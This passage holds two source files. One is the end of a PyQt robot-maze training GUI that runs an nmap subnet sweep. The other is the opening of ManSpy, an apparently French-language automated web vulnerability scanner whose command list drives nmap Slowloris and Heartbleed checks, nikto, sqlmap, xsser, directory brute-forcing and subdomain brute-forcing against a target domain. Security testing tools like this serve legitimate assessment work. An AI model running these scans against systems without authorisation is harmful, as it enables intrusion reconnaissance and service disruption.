QtWidgets.QMessageBox.about(self.w, "Error", "you must select a color first.")
return
if not self.scanned and self.problemStage == 0:
QtWidgets.QMessageBox.about(self.w, "Error", "What is the robots IP address?")
return
print(self.robotIP)
self.w.outputTextBox.setText("attempting to connect...")
self.w.outputTextBox.repaint()
self.commSocket.sendto("start robot".encode("ascii"), (self.robotIP, 6789))
time.sleep(.25)
if(self.problemStage == 0):
self.r = Robot(self.gs, self.w.colorSelection.currentText())
else:
self.r = Robot(self.gs, "green")
self.r.robotServer.allow_reuse_address = True
self.w.r = self.r
self.w.InitSliders()
if(self.r.robotServer.setupLine("") == True):
self.w.connectButton.setText("connected")
self.w.connectButton.setEnabled(False)
self.w.colorSelection.setEnabled(False)
self.w.networkGroupBox.setEnabled(False)
self.w.networkGroupBox.setVisible(False)
self.r.robotComm.start()
self.w.outputTextBox.setText("robot online\n" + str(self.r.robotServer.connection))
for r in self.w.radialButtons:
r.setVisible(False)
self.w.scanNetworkButton.setVisible(False)
self.w.radialSubmitButton.setVisible(False)
self.w.networkLabel.setVisible(False)
self.w.robotIPadrLabel.setText(self.robotIP)
if(self.problemStage == 0):
self.problemStage = 1
else:
self.w.outputTextBox.setText("Couldn't connect to robot.\nCheck the robotIP address.")
self.r.robotServer.connection.close()
return
class MyTextEdit(QtWidgets.QTextEdit, QtWidgets.QGroupBox):
'''reimplement text edit class to override keyPressEvent to capture the enter key.'''
def __init__(self, parent, parent2):
super(MyTextEdit, self).__init__(parent2)
def keyPressEvent(self, event):
super(MyTextEdit, self).keyPressEvent(event)
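# On Enter, climb the widget hierarchy (presumably group box -> central widget -> MainWindow)
# and call SendCommands() so the typed command sequence is submitted.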
if(event.key() == QtCore.Qt.Key_Return):
self.parent().parent().parent().SendCommands()
class ImageWidget(QtWidgets.QWidget):
def __init__(self, parent=None):
super(ImageWidget, self).__init__(parent)
self.image = None
def setImage(self, image):
self.image = image
sz = image.size()
self.setMinimumSize(sz)
self.update()
def paintEvent(self, event):
qp = QtGui.QPainter()
qp.begin(self)
if self.image:
qp.drawImage(QtCore.QPoint(0, 0), self.image)
qp.end()
class MainWindow(QtWidgets.QMainWindow, formXML):
def __init__(self, parentApp, parent=None):
QtWidgets.QMainWindow.__init__(self, parent)
self.setupUi(self)
self.parentApp = parentApp
self.gs = parentApp.gs
self.r = parentApp.r
self.showRange = False
self.window_width = self.AppFeed.frameSize().width()
self.window_height = self.AppFeed.frameSize().height()
self.AppFeed = ImageWidget(self.AppFeed)
self.AppFeedAlt = ImageWidget(self.AppFeedAlt)
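# The QTimer below calls Run() from the Qt event loop every millisecond; Run() redraws the
# camera-feed widgets and refreshes the status labels on each tick.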
self.timer = QtCore.QTimer(self)
self.timer.timeout.connect(self.Run)
self.timer.start(1)
self.colorSelection.addItem("robot color")
self.colorSelection.addItem("green")
self.colorSelection.addItem("pink")
self.colorSelection.addItem("blue")
########################################
##### INPUT #####
########################################
self.InputText = MyTextEdit(QtWidgets.QTextEdit, self.InputGroupBox)
self.InputText.setGeometry(QtCore.QRect(10, 30, 371, 61))
self.InputText.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.InputText.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.InputText.setObjectName("InputText")
########################################
##### BUTTONS #####
########################################
self.showMazeButton.clicked.connect(self.ShowMaze)
self.showWaypointsButton.clicked.connect(self.ShowWaypoints)
self.startButton.clicked.connect(self.Start)
self.textSubmitButton.clicked.connect(self.SendCommands)
self.connectButton.clicked.connect(self.parentApp.ConnectRobot)
self.radialSubmitButton.clicked.connect(self.SetRobotIP)
self.scanNetworkButton.clicked.connect(self.ScanNetwork)
self.rangeSensorButton.clicked.connect(self.StartRangeSensor)
########################################
##### SLIDERS #####
########################################
self.HColorSliderLow.valueChanged.connect(lambda: self.UpdateColors(1))
self.SColorSliderLow.valueChanged.connect(lambda: self.UpdateColors(2))
self.VColorSliderLow.valueChanged.connect(lambda: self.UpdateColors(3))
self.HColorSliderHigh.valueChanged.connect(lambda: self.UpdateColors(4))
self.SColorSliderHigh.valueChanged.connect(lambda: self.UpdateColors(5))
self.VColorSliderHigh.valueChanged.connect(lambda: self.UpdateColors(6))
########################################
##### RADIAL BUTTONS #####
########################################
self.radialButtons = []
self.radialButtons.append(self.radioButton_1)
self.radialButtons.append(self.radioButton_2)
self.radialButtons.append(self.radioButton_3)
self.radialButtons.append(self.radioButton_4)
self.radialButtons.append(self.radioButton_5)
for r in self.radialButtons:
r.setEnabled(False)
########################################
##### CHECK BOXES #####
########################################
self.checkBoxes = []
self.checkBoxes.append(self.checkBox_1)
self.checkBoxes.append(self.checkBox_2)
self.checkBoxes.append(self.checkBox_3)
self.checkBoxes.append(self.checkBox_4)
self.checkBoxes.append(self.checkBox_5)
for c in self.checkBoxes:
c.setVisible(False)
########################################
##### IMG ALGOS #####
########################################
self.imgBoxes = []
self.imgBoxes.append(self.imgAlgorithm_1)
self.imgBoxes.append(self.imgAlgorithm_2)
self.imgBoxes.append(self.imgAlgorithm_3)
self.imgBoxes.append(self.imgAlgorithm_4)
for i in self.imgBoxes:
i.setVisible(False)
return
def StartRangeSensor(self):
self.showRange = True
self.rangeSensorButton.setEnabled(False)
return
def SetRobotIP(self):
for r in self.radialButtons:
if(r.isChecked()):
self.parentApp.robotIP = r.text()
self.robotIPadrLabel.setText(self.parentApp.robotIP)
def ScanNetwork(self):
msgBox = QtWidgets.QMessageBox()
msgBox.setText("which network should we scan?")
msgBox.setWindowTitle("select a network to scan")
msgBox.setDetailedText("To determine your IP address, you can open a browser and go to www.whatismyipaddress.com; alternatively, open a terminal (press ctrl+alt+t) and type in a certain command to determine your computer's IP address...")
msgBox.addButton("192.168.1.0", 0)
msgBox.addButton("10.10.1.0", 0)
msgBox.addButton("129.59.105.0", 0)
self.outputTextBox.setText("scanning...")
res = msgBox.exec_()
if(res == 0):
result = subprocess.check_output(["nmap", "-sn", "192.168.1.0/24"])
for r in self.radialButtons:
r.setEnabled(True)
elif(res == 1):
result = subprocess.check_output(["nmap", "-sn", "10.10.1.0/24"])
else:
result = subprocess.check_output(["nmap", "-sn", "129.59.105.0/24"])
self.outputTextBox.setText(result.decode("ascii"))
self.parentApp.scanned = True
def InitSliders(self):
self.HColorSliderLow.setValue(self.r.low[0])
self.SColorSliderLow.setValue(self.r.low[1])
self.VColorSliderLow.setValue(self.r.low[2])
self.HColorSliderHigh.setValue(self.r.high[0])
self.SColorSliderHigh.setValue(self.r.high[1])
self.VColorSliderHigh.setValue(self.r.high[2])
self.lowRangeLabel.setText("Low Range: " + str(self.r.low))
self.highRangeLabel.setText("High Range: " + str(self.r.high))
pass
def ShowMaze(self):
if(self.gs.showMaze):
self.gs.showMaze = False
else:
self.gs.showMaze = True
def ShowWaypoints(self):
if(self.gs.showWaypoints):
self.gs.showWaypoints = False
else:
self.gs.showWaypoints = True
def UpdateColors(self, val):
if(val == 1):
self.r.low = (int(self.HColorSliderLow.value()), self.r.low[1], self.r.low[2])
if(val == 2):
self.r.low = (self.r.low[0], int(self.SColorSliderLow.value()), self.r.low[2])
if(val == 3):
self.r.low = (self.r.low[0], self.r.low[1], int(self.VColorSliderLow.value()))
if(val == 4):
self.r.high = (int(self.HColorSliderHigh.value()), self.r.high[1], self.r.high[2])
if(val == 5):
self.r.high = (self.r.high[0], int(self.SColorSliderHigh.value()), self.r.high[2])
if(val == 6):
self.r.high = (self.r.high[0], self.r.high[1], int(self.VColorSliderHigh.value()))
self.lowRangeLabel.setText("Low Range: " + str(self.r.low))
self.highRangeLabel.setText("High Range: " + str(self.r.high))
def SendCommands(self):
if(self.r.robotServer.connected):
self.r.SendCommandSequence(self.InputText.toPlainText())
self.commandHistory.setText(self.commandHistory.toPlainText() + self.InputText.toPlainText())
self.InputText.setText("")
def Start(self):
self.parentApp.running = True
self.parentApp.updateThread.start()
self.startButton.setEnabled(False)
self.startButton.setText('Starting...')
self.parentApp.t1 = time.time()
return
def Run(self):
if(self.parentApp.problemStage == 0):
self.problemDescription.setText("Establish a connection with the robot.")
elif(self.parentApp.problemStage == 1):
self.problemDescription.setText("navigate your way through the maze. Use the waypoints and short command sequences.")
elif(self.parentApp.problemStage == 2):
self.problemDescription.setText("Now that the robot can navigate through a virtual " +
"world, it's ready to navigate the real word. But " +
"first, ensure it won't run into any obstacles!\n\n" +
"Check out the range sensor and ensure it works.\n\n" +
"HINT: go to (2,2) and face the wall...")
else:
self.problemDescription.setText("")
if(self.showRange):
self.rangeLabel.setText(str(self.parentApp.r.range.value))
#print(str(self.parentApp.r.range.value))
if(self.parentApp.running):
self.startButton.setText("Camera is live")
if(type(self.r) == Robot):
img = self.r.FrameOverlay()
else:
img = self.gs.frame
img_height, img_width, img_colors = img.shape
scale_w = float(self.window_width) / float(img_width)
scale_h = float(self.window_height) / float(img_height)
scale = min([scale_w, scale_h])
if scale == 0:
scale = 1
img = cv2.resize(img, None, fx=scale, fy=scale, interpolation = cv2.INTER_CUBIC)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
height, width, bpc = img.shape
bpl = bpc * width
h,w,b = self.gs.frameCopy.shape
try:
image1 = QtGui.QImage(img.data, width, height, bpl, QtGui.QImage.Format_RGB888)
image2 = QtGui.QImage(self.gs.frameCopy, w, h, (b*w), QtGui.QImage.Format_RGB888)
self.AppFeed.setImage(image1)
self.AppFeedAlt.setImage(image2)
self.locationLabel.setText(str(self.r.location.value.decode('ascii')))
self.directionLabel.setText(str(self.r.direction.value.decode('ascii')))
self.distanceTravelledLabel.setText(str(self.r.distanceTravelled.value))
if(not self.r.mazeFinished and self.r.goalFound == True and self.parentApp.problemStage == 1):
self.outputTextBox.setText("Good Job!!")
self.r.mazeFinished = True
self.r.goalFound = False
self.parentApp.problemStage = 2
self.rangeSensorButton.setEnabled(True)
except Exception as e:
pass
def closeEvent(self, event):
self.parentApp.running = False
if(type(self.r) == Robot):
self.r.SendCommandSequence("Q")
time.sleep(1.2)
self.r._finished = True
self.r.robotServer.e.set()
self.r.robotServer.finished.value = True
if(self.r.robotComm.is_alive()):
self.r.robotComm.e.set()
self.r.robotComm.terminate()
self.r.robotComm.join()
self.r.robotServer.closeConnection()
return
|
manSpyV1.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ____
# __ _ ___ ____ / __/__ __ __
# / ' \/ _ `/ _ \_\ \/ _ \/ // /
#/_/_/_/\_,_/_//_/___/ .__/\_, /
# /_/ /___/
#
# Author : Mansour eddih
# Tool : ManSpy
# Usage : ./manspy.py 'exemple.com' (or) python manspy.py 'exemple.com'.
# Description : this tool automates the security-scanning process by driving the multitude
# of security tools available on Linux, plus some custom scripts.
# Import the libraries
import sys
import socket
import subprocess
import os
import time
import signal
import random
import string
import threading
import re
from urlparse import urlsplit
# Elapsed scan time
intervals = (
('h', 3600),
('m', 60),
('s', 1),
)
def display_time(seconds, granularity=3):
result = []
seconds = seconds + 1
for name, count in intervals:
value = seconds // count
if value:
seconds -= value * count
result.append("{}{}".format(value, name))
return ' '.join(result[:granularity])
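# For example, display_time(3725) returns "1h 2m 6s" (the function adds one second before
# formatting); granularity caps how many units are shown.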
def url_maker(url):
if not re.match(r'http(s?)\:', url):
url = 'http://' + url
parsed = urlsplit(url)
host = parsed.netloc
if host.startswith('www.'):
host = host[4:]
return host
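# For example, url_maker("https://www.exemple.com/page") returns "exemple.com": a scheme is
# added if missing, the netloc is extracted, and a leading "www." is stripped.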
def verifier_internet():
os.system('ping -c1 google.com > ms_net 2>&1')
if "0% packet loss" in open('ms_net').read():
val = 1
else:
val = 0
os.system('rm ms_net > /dev/null 2>&1')
return val
# Color codes class
class bcolors:
HEADER = '\033[95m'
TBLUE = '\033[94m'
TGREEN = '\033[92m'
TLRED = '\033[91m'
WARNING = '\033[93m'
BADFAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
BG_YLL = "\033[103m"
BG_LB = "\033[105m"
BG_Cyan = '\033[46m'
BG_ERR_TXT = '\033[41m' # For critical errors and crashes
BG_HEAD_TXT = '\033[100m'
BG_ENDL_TXT = '\033[46m'
BG_CRIT_TXT = '\033[45m'
BG_HIGH_TXT = '\033[41m'
BG_MED_TXT = '\033[43m'
BG_LOW_TXT = '\033[44m'
BG_INFO_TXT = '\033[42m'
# Classifies the severity of a vulnerability
def vul_info(val):
resultat = ''
if val == 'c':
resultat = bcolors.BG_CRIT_TXT + " critique " + bcolors.ENDC
elif val == 'e':
resultat = bcolors.BG_HIGH_TXT + " élevé " + bcolors.ENDC
elif val == 'm':
resultat = bcolors.BG_MED_TXT + " moyen " + bcolors.ENDC
elif val == 'f':
resultat = bcolors.BG_LOW_TXT + " faible " + bcolors.ENDC
else:
resultat = bcolors.BG_INFO_TXT + " info " + bcolors.ENDC
return resultat
# Indicators
proc_haut = bcolors.BADFAIL + "●" + bcolors.ENDC
proc_med = bcolors.WARNING + "●" + bcolors.ENDC
proc_fible = bcolors.TGREEN + "●" + bcolors.ENDC
# Ties each vulnerability to its threat level, definition and remediation...
def vul_as_info(v1, v2, v3):
print (bcolors.BOLD + "Niveau de menace de vulnérabilité" + bcolors.ENDC)
print ("\t" + vul_info(v2) + " " + bcolors.WARNING + str(rep_outil[v1][0]) + bcolors.ENDC)
print (bcolors.BOLD + "Définition de la vulnérabilité" + bcolors.ENDC)
print ("\t" + bcolors.BADFAIL + str(outils_correctifs[v3 - 1][1]) + bcolors.ENDC)
print (bcolors.BOLD + "Assainissement de la vulnérabilité" + bcolors.ENDC)
print ("\t" + bcolors.TGREEN + str(outils_correctifs[v3 - 1][2]) + bcolors.ENDC)
# ManSpy Help
def helper():
print (bcolors.TBLUE + "Les informations:" + bcolors.ENDC)
print ("------------")
print ("\t./manSpy.py exemple.com: analyse le domaine 'exemple.com'")
print ("\t./manSpy.py --help : Affiche ce contexte d'aide.")
print (bcolors.TBLUE + "Interactives:" + bcolors.ENDC)
print ("------------")
print (bcolors.TLRED +"\tCtrl+C:"+bcolors.ENDC+" Ignore le test en cours.")
print (bcolors.TLRED +"\tCtrl+Z:"+bcolors.ENDC+" Quitte ManSpy.")
print (bcolors.TBLUE + "Les index:" + bcolors.ENDC)
print ("--------")
print ("\t[" + proc_haut + "]: Le processus de numérisation peut prendre plus de temps (non prévisible).")
print ("\t[" + proc_med + "]: Le processus de numérisation peut prendre moins de 10 minutes.")
print ("\t[" + proc_fible + "]: Le processus de numérisation peut prendre moins d’une minute ou deux.")
print (bcolors.BG_Cyan + "Les informations de vulnérabilité" + bcolors.ENDC)
print ("--------------------------")
print ("\t" + vul_info(
'c') + ": A besion une attention immédiate car cela peut entraîner des compromissions ou une indisponibilité du service.")
print ("\t" + vul_info(
'e') + " : Peut ne pas conduire à un compromis immédiat, mais les chances de probabilité sont grandes.")
print ("\t" + vul_info(
'm') + " : L'attaquant peut mettre en corrélation plusieurs vulnérabilités de ce type pour lancer une attaque sophistiquée.")
print ("\t" + vul_info('f') + " : Pas un problème grave, mais il est recommandé d'assister à la conclusion.")
print ("\t" + vul_info(
'i') + " : Ne pas classé comme une vulnérabilité,tout simplement une alerte informationnelle utile à prendre en compte.\n")
# Clears the previous console line
def clear():
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
# ManSpy Logo
def logo():
print (bcolors.WARNING)
print("""\
_____ ______ ________ ________ ________ ________ ___ ___
|\ _ \ _ \|\ __ \|\ ___ \|\ ____\|\ __ \|\ \ / /|
\ \ \\\__\ \ \ \ \|\ \ \ \\ \ \ \ \___|\ \ \|\ \ \ \/ / /
\ \ \\|__| \ \ \ __ \ \ \\ \ \ \_____ \ \ ____\ \ / /
\ \ \ \ \ \ \ \ \ \ \ \\ \ \|____|\ \ \ \___|\/ / /
\ \__\ \ \__\ \__\ \__\ \__\\ \__\____\_\ \ \__\ __/ / /
\|__| \|__|\|__|\|__|\|__| \|__|\_________\|__||\___/ /
\|_________| \|___|/
""" + bcolors.TLRED + """(Mansour Eddih - Maryem Abouhafes - Hanane Rajji '4isi')
""")
print (bcolors.ENDC)
class Spinner:
occupe = False
retard = 0.05
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/\\': yield cursor #←↑↓→
#for cursor in '←↑↓→': yield cursor !! display issue !!!
def __init__(self, retard=None):
self.spinner_generator = self.spinning_cursor()
if retard and float(retard): self.retard = retard
def spinner_task(self):
try:
while self.occupe:
#sys.stdout.write(next(self.spinner_generator))
print bcolors.BG_ERR_TXT+next(self.spinner_generator)+bcolors.ENDC,
sys.stdout.flush()
time.sleep(self.retard)
sys.stdout.write('\b')
sys.stdout.flush()
except (KeyboardInterrupt, SystemExit):
#clear()
print "\n\t"+ bcolors.BG_ERR_TXT+"ManSpy à reçu une série des clicks sur Ctrl + C. Quitter..." +bcolors.ENDC
sys.exit(1)
def start(self):
self.occupe = True
threading.Thread(target=self.spinner_task).start()
def stop(self):
try:
self.occupe = False
time.sleep(self.retard)
except (KeyboardInterrupt, SystemExit):
#clear()
print "\n\t"+ bcolors.BG_ERR_TXT+"ManSpy à reçu une série des clicks sur Ctrl + C. Quitter..." +bcolors.ENDC
sys.exit(1)
spinner = Spinner()
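# Each noms_outils entry appears to be [internal id, display description, required binary, enabled flag];
# the lists below (cmd_outils, rep_outil, outils_status) seem to be indexed in parallel with it.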
noms_outils = [
["host", "host - Vérifie l'existence d'une adresse IPV6.", "host", 1],
["aspnet_config_err", "ASP.Net Misconfiguration - Vérifie si ASP.Net Misconfiguration.", "wget", 1],
["wp_check", "WordPress Checker - Vérifie l'installation de WordPress.", "wget", 1],
["drp_check", "Drupal Checker - Vérifie l’installation de Drupal.", "wget", 1],
["joom_check", "Joomla Checker - Vérifie l’installation de Joomla.", "wget", 1],
["uniscan", "Uniscan - Vérifie les fichiers robots.txt et sitemap.xml", "uniscan", 1],
["wafw00f", "Wafw00f - Vérifications des pare-feu applicatifs.", "wafw00f", 1],
["nmap", "Nmap - Analyse rapide [seulement quelques vérifications de ports] "," nmap ", 1],
["theharvester", "The Harvester - Analyse les emails en utilisant la recherche passive de Google.", "theharvester", 1],
["dnsrecon", "DNSRecon - tente plusieurs transferts de zone sur des serveurs de noms.", "dnsrecon", 1],
["féroce", "Féroce - Tentatives de transfert de zone [Pas de force brutale]", "féroce", 1],
["dnswalk", "DNSWalk - Tentative de transfert de zone.", "dnswalk", 1],
["whois", "WHOis - Vérifications des informations de contact de l'administrateur.", "whois", 1],
["nmap_header", "Nmap [Vérification du filtre XSS] - Vérifie si l'en-tête de protection XSS est présent.", "nmap", 1],
["nmap_sloris", "Nmap [Slowloris DoS] - Vérifications de la vulnérabilité de déni de service de Slowloris.", "nmap", 1],
["sslyze_hbleed", "SSLyze - Vérifie uniquement la vulnérabilité Heartbleed.", "sslyze", 1],
["nmap_hbleed", "Nmap [Heartbleed] - Vérifie uniquement la vulnérabilité de Heartbleed.", "nmap", 1],
["nmap_poodle", "Nmap [POODLE] - Vérifie uniquement la vulnérabilité du caniche.", "nmap", 1],
["nmap_ccs", "Nmap [Injection OpenSSL CCS] - Vérifie uniquement l'injection CCS.", "nmap", 1],
["nmap_freak", "Nmap [FREAK] - Vérifie uniquement la vulnérabilité de FREAK.", "nmap", 1],
["nmap_logjam", "Nmap [LOGJAM] - Vérifications de la vulnérabilité de LOGJAM.", "nmap", 1],
["sslyze_ocsp", "SSLyze - Vérifie l'agrafage OCSP.", "sslyze", 1],
["sslyze_zlib", "SSLyze - Vérifications de la compression ZLib Deflate.", "sslyze", 1],
["sslyze_reneg", "SSLyze - Vérifie la prise en charge de la renégociation sécurisée et la renégociation du client.", "sslyze", 1],
["sslyze_resum", "SSLyze - Vérifie la prise en charge de la reprise de session avec [ID de session / tickets TLS].", "sslyze", 1],
["lbd", "LBD - Vérifications des équilibreurs de charge DNS / HTTP.", "lbd", 1],
["golismero_dns_malware", "Golismero - Vérifie si le domaine est spoofé ou détourné.", "golismero", 1],
["golismero_heartbleed", "Golismero - Recherche uniquement la vulnérabilité Heartbleed.", "golismero", 1],
["golismero_brute_url_predictables", "Golismero - BruteForces pour certains fichiers du domaine.", "golismero", 1],
["golismero_brute_directories", "Golismero - BruteForces pour certains répertoires du domaine.", "golismero", 1],
["golismero_sqlmap", "Golismero - SQLMap [ne récupère que la bannière DB]", "golismero", 1],
["dirb", "DirB - Brute la cible pour les répertoires ouverts.", "dirb", 1],
["xsser", "XSSer - Vérifications d'attaques de script intersite [XSS].", "xsser", 1],
["golismero_ssl_scan", "Analyses SSL Golismero - Effectue des analyses liées à SSL.", "golismero", 1],
["golismero_zone_transfer", "Transfert de zone Golismero - Tentative de transfert de zone.", "golismero", 1],
["golismero_nikto", "Golismero Nikto Scans - Utilise Nikto Plugin pour détecter les vulnérabilités.", "golismero", 1],
["golismero_brute_subdomains", "Sous-domaines de Golismero Bruter - Découverte de sous-domaines de forces brutes.", "golismero", 1],
["dnsenum_zone_transfer", "DNSEnum - Tentative de transfert de zone.", "dnsenum", 1],
["fierce_brute_subdomains", "Fierce Subdomains Bruter - Découverte du sous-domaine des forces brutes.", "farce", 1],
["dmitry_email", "DMitry - Récolte de manière passive les emails du domaine.", "dmitry", 1],
["dmitry_subdomains", "DMitry - Récolte de manière passive des sous-domaines du domaine.", "dmitry", 1],
["nmap_telnet", "Nmap [TELNET] - Vérifie si le service TELNET est en cours d'exécution.", "nmap", 1],
["nmap_ftp", "Nmap [FTP] - Vérifie si le service FTP est en cours d'exécution.", "nmap", 1],
["nmap_stuxnet", "Nmap [STUXNET] - Vérifie si l'host est affecté par le ver STUXNET.", "nmap", 1],
["webdav", "WebDAV - Vérifie si WEBDAV est activé sur le répertoire personnel.", "davtest", 1],
["golismero_finger", "Golismero - Fait une empreinte digitale sur le domaine.", "golismero", 1],
["uniscan_filebrute", "Uniscan - Brutes pour les noms de fichiers sur le domaine.", "uniscan", 1],
["uniscan_dirbrute", "Uniscan - Annuaires Brutes sur le domaine", "uniscan", 1],
["uniscan_ministresser", "Uniscan - Tester le domaine.", "uniscan", 1],
["uniscan_rfi", "Uniscan - Vérifications LFI, RFI et RCE.", "uniscan", 1],
["uniscan_xss", "Uniscan - Vérifications XSS, SQLi, BSQLi et autres vérifications.", "uniscan", 1],
["nikto_xss", "Nikto - Vérifie l'en-tête XSS d'Apache Expect.", "nikto", 1],
["nikto_subrute", "Nikto - Brutes Subdomains.", "nikto", 1],
["nikto_shellshock", "Nikto - Vérifications du bogue Shellshock.", "nikto", 1],
["nikto_internalip", "Nikto - Recherche des fuites internes IP", "nikto", 1],
["nikto_putdel", "Nikto - Vérifie si HTTP PUT DEL.", "nikto", 1],
["nikto_headers", "Nikto - Vérifie les en-têtes de domaine.", "nikto", 1],
["nikto_ms01070", "Nikto - Vérifications de la vulnérabilité MS10-070.", "nikto", 1],
["nikto_servermsgs", "Nikto - Vérifications des problèmes de serveur.", "nikto", 1],
["nikto_outdated", "Nikto - Vérifie si le serveur est obsolète.", "nikto", 1],
["nikto_httpoptions", "Nikto - Vérifie les options HTTP sur le domaine.", "nikto", 1],
["nikto_cgi", "Nikto - Énumère les répertoires CGI.", "nikto", 1],
["nikto_ssl", "Nikto - Effectue des vérifications SSL.", "nikto", 1],
["nikto_sitefiles", "Nikto - Vérifie la présence de fichiers intéressants sur le domaine.", "nikto", 1],
["nikto_paths", "Nikto - Vérifie les chemins injectables.", "nikto", 1],
["dnsmap_brute", "DNSMap - Brutes Subdomains.", "dnsmap", 1],
["nmap_sqlserver", "Nmap - Vérifications de la base de données MS-SQL Server", "nmap", 1],
["nmap_mysql", "Nmap - Vérifie la base de données MySQL", "nmap", 1],
["nmap_oracle", "Nmap - Vérifications de la base de données ORACLE", "nmap", 1],
["nmap_rdp_udp", "Nmap - Vérifie le service Bureau à distance via UDP", "nmap", 1],
["nmap_rdp_tcp", "Nmap - Vérifie le service Bureau à distance via TCP", "nmap", 1],
["nmap_full_ps_tcp", "Nmap - Effectue une analyse complète du port TCP", "nmap", 1],
["nmap_full_ps_udp", "Nmap - Effectue une analyse complète du port UDP", "nmap", 1],
["nmap_snmp", "Nmap - Vérifications du service SNMP", "nmap", 1],
["aspnet_elmah_axd", "Vérifications pour ASP.net Elmah Logger", "wget", 1],
["nmap_tcp_smb", "Vérifie le service SMB sur TCP", "nmap", 1],
["nmap_udp_smb", "Vérifications du service SMB sur UDP", "nmap", 1],
["wapiti", "Wapiti - Vérifications de SQLi, RCE, XSS et autres vulnérabilités", "wapiti", 1],
["nmap_iis", "Nmap - Vérifications de IIS WebDAV", "nmap", 1],
["whatweb", "WhatWeb - Vérifie l'en-tête de protection X-XSS", "whatweb", 1]
]
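# cmd_outils: presumably [command prefix, suffix] pairs, with the target domain inserted
# between the two parts when each scan command is built.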
cmd_outils = [
["host ",""],
["wget -O temp_aspnet_config_err --tries=1 ","/%7C~.aspx"],
["wget -O temp_wp_check --tries=1 ","/wp-admin"],
["wget -O temp_drp_check --tries=1 ","/user"],
["wget -O temp_joom_check --tries=1 ","/administrator"],
["uniscan -e -u ",""],
["wafw00f ",""],
["nmap -F --open -Pn ",""],
["theharvester -l 50 -b google -d ",""],
["dnsrecon -d ",""],
["fierce -wordlist xxx -dns ",""],
["dnswalk -d ","."],
["whois ",""],
["nmap -p80 --script http-security-headers -Pn ",""],
["nmap -p80,443 --script http-slowloris --max-parallelism 500 -Pn ",""],
["sslyze --heartbleed ",""],
["nmap -p443 --script ssl-heartbleed -Pn ",""],
["nmap -p443 --script ssl-poodle -Pn ",""],
["nmap -p443 --script ssl-ccs-injection -Pn ",""],
["nmap -p443 --script ssl-enum-ciphers -Pn ",""],
["nmap -p443 --script ssl-dh-params -Pn ",""],
["sslyze --certinfo=basic ",""],
["sslyze --compression ",""],
["sslyze --reneg ",""],
["sslyze --resum ",""],
["lbd ",""],
["golismero -e dns_malware scan ",""],
["golismero -e heartbleed scan ",""],
["golismero -e brute_url_predictables scan ",""],
["golismero -e brute_directories scan ",""],
["golismero -e sqlmap scan ",""],
["dirb http://"," -fi"],
["xsser --all=http://",""],
["golismero -e sslscan scan ",""],
["golismero -e zone_transfer scan ",""],
["golismero -e nikto scan ",""],
["golismero -e brute_dns scan ",""],
["dnsenum ",""],
["fierce -dns ",""],
["dmitry -e ",""],
["dmitry -s ",""],
["nmap -p23 --open -Pn ",""],
["nmap -p21 --open -Pn ",""],
["nmap --script stuxnet-detect -p445 -Pn ",""],
["davtest -url http://",""],
["golismero -e fingerprint_web scan ",""],
["uniscan -w -u ",""],
["uniscan -q -u ",""],
["uniscan -r -u ",""],
["uniscan -s -u ",""],
["uniscan -d -u ",""],
["nikto -Plugins 'apache_expect_xss' -host ",""],
["nikto -Plugins 'subdomain' -host ",""],
["nikto -Plugins 'shellshock' -host ",""],
["nikto -Plugins 'cookies' -host ",""],
["nikto -Plugins 'put_del_test' -host ",""],
["nikto -Plugins 'headers' -host ",""],
["nikto -Plugins 'ms10-070' -host ",""],
["nikto -Plugins 'msgs' -host ",""],
["nikto -Plugins 'outdated' -host ",""],
["nikto -Plugins 'httpoptions' -host ",""],
["nikto -Plugins 'cgi' -host ",""],
["nikto -Plugins 'ssl' -host ",""],
["nikto -Plugins 'sitefiles' -host ",""],
["nikto -Plugins 'paths' -host ",""],
["dnsmap ",""],
["nmap -p1433 --open -Pn ",""],
["nmap -p3306 --open -Pn ",""],
["nmap -p1521 --open -Pn ",""],
["nmap -p3389 --open -sU -Pn ",""],
["nmap -p3389 --open -sT -Pn ",""],
["nmap -p1-65535 --open -Pn ",""],
["nmap -p1-65535 -sU --open -Pn ",""],
["nmap -p161 -sU --open -Pn ",""],
["wget -O temp_aspnet_elmah_axd --tries=1 ","/elmah.axd"],
["nmap -p445,137-139 --open -Pn ",""],
["nmap -p137,138 --open -Pn ",""],
["wapiti "," -f txt -o temp_wapiti"],
["nmap -p80 --script=http-iis-webdav-vuln -Pn ",""],
["whatweb "," -a 1"]
]
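# rep_outil: one finding per tool -- [message, severity code ('c'/'e'/'m'/'f' or info),
# 1-based index into outils_correctifs], as consumed by vul_as_info() above.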
rep_outil = [
["N'a pas d'adresse IPv6. C'est bien d'en avoir un.","i",1],
["ASP.Net est mal configuré pour afficher les erreurs de pile de serveurs à l'écran.","m",2],
["WordPress Installation trouvée. Rechercher les vulnérabilités correspond à cette version.","i",3],
["Drupal Installation trouvée. Rechercher les vulnérabilités correspond à cette version.","i",4],
["Joomla Installation trouvée. Rechercher les vulnérabilités correspond à cette version.","i",5],
["robots.txt/sitemap.xml a trouvé. Vérifiez ces fichiers pour toute information.","i",6],
["Aucun pare-feu d'application Web à été détecté","m",7],
["Certains ports sont ouverts. Effectuer une analyse complète manuellement.","f",8],
["Adresses email trouvées.","f",9],
["Transfert de zone réussi avec DNSRecon. Reconfigurer le DNS immédiatement","e",10],
["Transfert de zone réussi avec fierce. Reconfigurer le DNS immédiatement.","e",10],
["Transfert de zone réussi avec dnswalk. Reconfigurer le DNS immédiatement.","e",10],
["Informations Whois disponibles publiquement.","i",11],
["Le filtre de protection XSS est désactivé.","m",12],
["Vulnérable au déni de service de Slowloris.","c",13],
["Vulnérabilité HEARTBLEED trouvée avec SSLyze.","e",14],
["Vulnérabilité HEARTBLEED trouvée avec Nmap.","e",14],
["Vulnérabilité POODLE détectée.","e",15],
["OpenSSL CCS Injection détectée","e",16],
["Vulnérabilité FREAK détectée","e",17],
["Vulnérabilité de LOGJAM détectée.","e",18],
["Réponse OCSP infructueuse.","m",19],
["Le serveur prend en charge la compression Deflate.","m",20],
["La renégociation sécurisée n'est pas prise en charge.","m",21],
["Reprise sécurisée non prise en charge avec (ID de session / Billets TLS).","m",22],
["Aucun équilibreur de charge basé sur DNS / HTTP trouvé.","f",23],
["le domaine est spoofed/hijacked.","e",24],
